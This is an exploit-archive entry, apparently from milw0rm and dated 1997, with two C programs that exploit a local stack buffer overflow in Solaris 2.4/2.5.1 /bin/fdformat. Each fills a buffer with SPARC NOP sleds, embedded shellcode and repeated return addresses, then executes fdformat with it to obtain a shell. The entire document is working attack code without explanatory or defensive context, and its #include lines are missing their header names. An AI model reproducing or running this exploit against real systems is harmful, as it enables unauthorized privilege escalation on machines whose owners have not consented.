Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow - CVE-1999-0315/1999-0110

1. --------------------------- lion24.c ---------------------------------
2. /*
3. Solaris 2.4
4. */
5.  
6.   #include
7.    #include
8.    #include
9.    #include
10.    
11.    #define BUF_LENGTH 264
12.    #define EXTRA 36
13.    #define STACK_OFFSET -56
14.    #define SPARC_NOP 0xa61cc013
15.    
16.    u_char sparc_shellcode[] =
17.  
18.    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
19.    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
20.    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
21.    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
22.    "\x91\xd0\x20\x08"
23.    ;
24.    
25.    u_long get_sp(void)
26.    {
27.    __asm__("mov %sp,%i0 \n");
28.    }
29.    
30.    void main(int argc, char *argv[])
31.    {
32.    char buf[BUF_LENGTH + EXTRA + 8];
33.    long targ_addr;
34.    u_long *long_p;
35.    u_char *char_p;
36.    int i, code_length = strlen(sparc_shellcode),dso=0;
37.    
38.    if(argc > 1) dso=atoi(argv[1]);
39.    
40.    long_p =(u_long *) buf ;
41.    targ_addr = get_sp() - STACK_OFFSET - dso;
42.    
43.    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
44.    *long_p++ = SPARC_NOP;
45.    
46.    char_p = (u_char *) long_p;
47.    
48.    for (i = 0; i < code_length; i++)
49.    *char_p++ = sparc_shellcode[i];
50.    
51.    long_p = (u_long *) char_p;
52.    
53.    for (i = 0; i < EXTRA / sizeof(u_long); i++)
54.    *long_p++ =targ_addr;
55.    
56.    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
57.    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
58.    execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
59.    perror("execl failed");
60.    }
61. ------------------------------ end of lion24.c --------------------------
62.  
63. -------------------------------- lion25.c ------------------------------
64. /*
65. Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
66. 2.5.1
67. */
68.  
69.    #include
70.    #include
71.    #include
72.    #include
73.    
74.    #define BUF_LENGTH 364
75.    #define EXTRA 400
76.    #define STACK_OFFSET 704
77.    #define SPARC_NOP 0xa61cc013
78.    
79.    u_char sparc_shellcode[] =
80.  
81.    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
82.    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
83.    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
84.    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
85.    "\x91\xd0\x20\x08"
86.    ;
87.    
88.    u_long get_sp(void)
89.    {
90.    __asm__("mov %sp,%i0 \n");
91.    }
92.    void main(int argc, char *argv[])
93.    {
94.    char buf[BUF_LENGTH + EXTRA + 8];
95.    long targ_addr;
96.    u_long *long_p;
97.    u_char *char_p;
98.    int i, code_length = strlen(sparc_shellcode),dso=0;
99.    
100.    if(argc > 1) dso=atoi(argv[1]);
101.    
102.    long_p =(u_long *) buf ;
103.    targ_addr = get_sp() - STACK_OFFSET - dso;
104.    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
105.    *long_p++ = SPARC_NOP;
106.    
107.    char_p = (u_char *) long_p;
108.    
109.    for (i = 0; i < code_length; i++)
110.    *char_p++ = sparc_shellcode[i];
111.    
112.    long_p = (u_long *) char_p;
113.    
114.    for (i = 0; i < EXTRA / sizeof(u_long); i++)
115.    *long_p++ =targ_addr;
116.    
117.    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
118.    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
119.    execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
120.    perror("execl failed");
121.    }
122.  
123. --------------------------- end of lion25.c -------------------------------
124.  
125.  
126. // milw0rm.com [1997-03-23]
127.